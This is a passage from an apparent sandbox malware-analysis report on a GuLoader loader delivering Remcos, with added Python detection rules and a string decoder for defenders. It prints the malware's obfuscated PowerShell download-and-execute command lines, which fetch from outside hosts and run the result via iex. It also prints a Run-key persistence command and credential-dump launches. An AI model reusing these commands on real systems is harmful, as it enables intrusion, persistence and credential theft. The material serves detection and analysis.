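    "For($I=5;$I -lt $Max;$I+=6){$Out+=$Blob.$Alpha.Invoke( $I, $Beta);}$Out;}"
    "function Run($Code){ & ($Invoker) ($Code);}"
    "$Url=Decode '" + encode_every_sixth("http://example.invalid/stage2.bin") + "';"
    "$Agent=Decode '" + encode_every_sixth("Mozilla/5.0 (Windows NT 10.0; Win64; x64)") + "';"
    "$Invoker=Decode '" + encode_every_sixth("iex") + "';\""
)

if __name__ == "__main__":
    print(decode_every_sixth(FLIGENE_LITERAL), decode_every_sixth(LRREDSKJOLERNES_LITERAL))
    for s in recover_strings(SAMPLE_CMDLINE):
        print(s)
```

The regex keys on the loop shape (`For($x=5; ...; $x+=6)`) rather than on any name, so the same call works on both stages on this page even though every identifier differs between them; if a later variant changes the step or the offset from the end, adjust `limit` from the `$Length-$n` expression rather than hard-coding 1.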
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
              Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
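The process chain listed above is the part of this report that is cheapest to turn into detection logic, because none of it depends on the randomised names: 32-bit PowerShell starts wab.exe (Windows Address Book) as the hollowing target; the injected wab.exe then spawns cmd.exe to run REG ADD against HKCU\...\CurrentVersion\Run with a REG_EXPAND_SZ value whose payload is not on disk at all but is read back out of a second registry key with Get-ItemProperty; wab.exe re-launches itself with `/stext <temp file>`, the save-to-text switch of the NirSoft recovery utilities that Remcos runs for the mail and browser credential theft flagged elsewhere in the report; and wab.exe starts wscript.exe on a .vbs in %TEMP%. The following is an added example, not part of the Joe Sandbox report, that encodes those four parent/child and command-line relations as rules and runs them over a handful of process-creation events. The event records are reconstructed from the lines above (image paths and command lines as the report shows them); the benign notepad.exe event and the event structure itself are constructed for the example and do not correspond to any particular EDR or Sysmon schema.

```python
import re
from dataclasses import dataclass

# Minimal process-creation record; map your telemetry (Sysmon EID 1,
# EDR process events) onto these three fields.
@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    cmdline: str

def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# Children that Windows Address Book has no business launching.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "reg.exe", "powershell.exe"}

RULES = {
    # PowerShell launching wab.exe: the loader's injection target in this report.
    "ps_spawns_wab": lambda e: base(e.parent_image) == "powershell.exe"
        and base(e.image) == "wab.exe",
    # wab.exe spawning a script host, shell or reg.exe: post-injection activity.
    "wab_spawns_lolbin": lambda e: base(e.parent_image) == "wab.exe"
        and base(e.image) in SCRIPT_HOSTS,
    # wab.exe re-launched with /stext: NirSoft-style credential dump to a temp file.
    "wab_stext_dump": lambda e: base(e.image) == "wab.exe"
        and re.search(r"\s/stext\s", e.cmdline, re.I) is not None,
    # Run-key value that pulls its real payload from another registry key.
    "runkey_reads_registry_payload": lambda e: base(e.image) == "reg.exe"
        and re.search(r"CurrentVersion\\Run\b", e.cmdline, re.I) is not None
        and re.search(r"Get-ItemProperty", e.cmdline, re.I) is not None,
}

def evaluate(events):
    """Return (event index, rule name) for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for name, check in RULES.items():
            if check(ev):
                hits.append((idx, name))
    return hits

# The REG ADD command exactly as the report shows it (split only to keep the
# single quotes inside a raw string).
REG_ADD_CMD = (
    r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" '
    r'/t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path '
    + "'HKCU:\\Agenetic76\\'"
    + r').Tautologiske178;%Semicomic% ($Affektationernes)"'
)

WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"

# Events 0-4 are reconstructed from the report's process tree; event 5 is a
# constructed benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", WAB,
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(WAB, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD_CMD),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\reg.exe", REG_ADD_CMD),
    ProcEvent(WAB, WAB,
              r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"'),
    ProcEvent(WAB, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'),
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The rules look only at the immediate parent, which is enough for the tree on this page but will miss the same behaviour if an extra cmd.exe or conhost.exe hop is inserted; for the persistence rule, follow up by reading the key the Run value references (here `HKCU:\Agenetic76`, value `Tautologiske178`), since that is where the actual PowerShell payload lives and the Run value itself is only a loader.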
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe  Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
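The PowerShell stage in the command line above hides every string behind a helper named Beshout: it walks the literal with Substring, keeping the character at index 5, 11, 17, ... and discarding the five filler characters between them, while the trailing character is never read because the loop stops at Length - $Knnest. The function Lovbundnes then dot-sources $Afskalningernes on the decoded text, so each Lovbundnes (Beshout '...') is a decode-then-execute step. The decoder below is an added example written for this page, not code from the sample, its authors or Joe Sandbox. It ports Beshout to Python and runs it over three short literals copied verbatim from the command line ($Formaliaers, $Morsomhedernes78 and $Afskalningernes, which come out as User-Agent, > and iex); the longer literals appear to have lost their runs of consecutive spaces in the rendered report, which breaks the six-character stride, so they are not reproduced here. The encoder and the final Lovbundnes line in SAMPLE are constructed for testing and are not from the sample.

```python
"""Decoder for the Substring-stride obfuscation in the PowerShell stage above.

Added example for this page (not the sample's, GuLoader's or Joe Sandbox's code).
It ports the sample's own helper, which in the command line reads:

    $Radiosender='Substring'; $Knnest = 1
    Function Beshout($Solurenes){
        $Strejftogters=$Solurenes.Length-$Knnest
        For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){
            $Neodadaism+=$Solurenes.$Radiosender.Invoke($Overskringers,$Knnest)}
        $Neodadaism}

Every sixth character from index 5 is payload, the other five are filler, and the
final character is never read. The encoder is only here to build constructed inputs.
"""
import itertools
import re

STRIDE, FIRST, TAIL = 6, 5, 1   # For-loop step, its start index, and $Knnest


def beshout_decode(blob: str) -> str:
    """Port of Beshout(): keep blob[5], blob[11], ... while the index is < len(blob) - 1."""
    return "".join(blob[i] for i in range(FIRST, len(blob) - TAIL, STRIDE))


def beshout_encode(plain: str, filler: str = "abcdefghijklmnop") -> str:
    """Inverse transform (my addition, used only to construct test inputs)."""
    src = itertools.cycle(filler)
    out = []
    for ch in plain:
        out.append("".join(next(src) for _ in range(STRIDE - 1)))  # five filler characters
        out.append(ch)                                               # then the real one
    out.append(next(src))  # trailing character the decoder skips because of $Knnest
    return "".join(out)


ASSIGN = re.compile(r"(\$\w+)\s*=\s*Beshout\s+'([^']*)'")
INVOKE = re.compile(r"Lovbundnes\s*\(\s*Beshout\s+'([^']*)'\s*\)")


def decode_assignments(script: str) -> dict:
    """Every `$var = Beshout '...'` assignment in the script, decoded."""
    return {var: beshout_decode(lit) for var, lit in ASSIGN.findall(script)}


def decode_invocations(script: str) -> list:
    """Strings handed to Lovbundnes, which the sample defines as `. iex (<decoded>)`."""
    return [beshout_decode(lit) for lit in INVOKE.findall(script)]


# The first three statements are copied verbatim from the command line in this report;
# the Lovbundnes line is constructed with the encoder above and is not from the sample.
SAMPLE = (
    "$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';"
    "$Morsomhedernes78=Beshout ' Pli.>Bemr, ';"
    "$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';"
    "Lovbundnes (Beshout '" + beshout_encode("Write-Host constructed") + "');"
)

if __name__ == "__main__":
    for var, value in decode_assignments(SAMPLE).items():
        print(f"{var:<20} -> {value!r}")
    print("executed via Lovbundnes:", decode_invocations(SAMPLE))
```

Because the stride is fixed, the same decoder works on every string in this stage once the literal is recovered with its whitespace intact (for example from the process command line captured by the sandbox rather than from the rendered HTML); the only sample-specific part is the name of the helper, which GuLoader randomises per build, so point the two regular expressions at whatever the current sample calls Beshout and Lovbundnes.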
Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
